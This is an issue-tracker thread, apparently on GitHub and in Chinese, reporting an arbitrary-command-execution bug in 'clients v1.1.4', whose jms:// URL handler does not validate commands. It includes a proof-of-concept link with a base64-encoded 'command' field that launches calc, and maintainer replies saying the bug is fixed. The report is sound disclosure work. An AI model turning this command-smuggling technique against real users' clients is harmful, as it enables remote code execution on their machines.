[Bug] 任意命令执行
zzyzhangziyu opened this issue · comments
zzyzhangziyu commented
clients v1.1.4
Bug 描述
clients v1.1.4 没有对jms url的命令进行验证,任意命令可以下发到客户端
Bug 重现步骤(有截图更好)
poc jms://eyJwcm90b2NvbCI6Inh4eCIsInVzZXJuYW1lIjoieHh4IiwiY29tbWFuZCI6ImNhbGMifQ==
上面的poc 可以打开calc
老广 commented
收到
老广 commented
已解决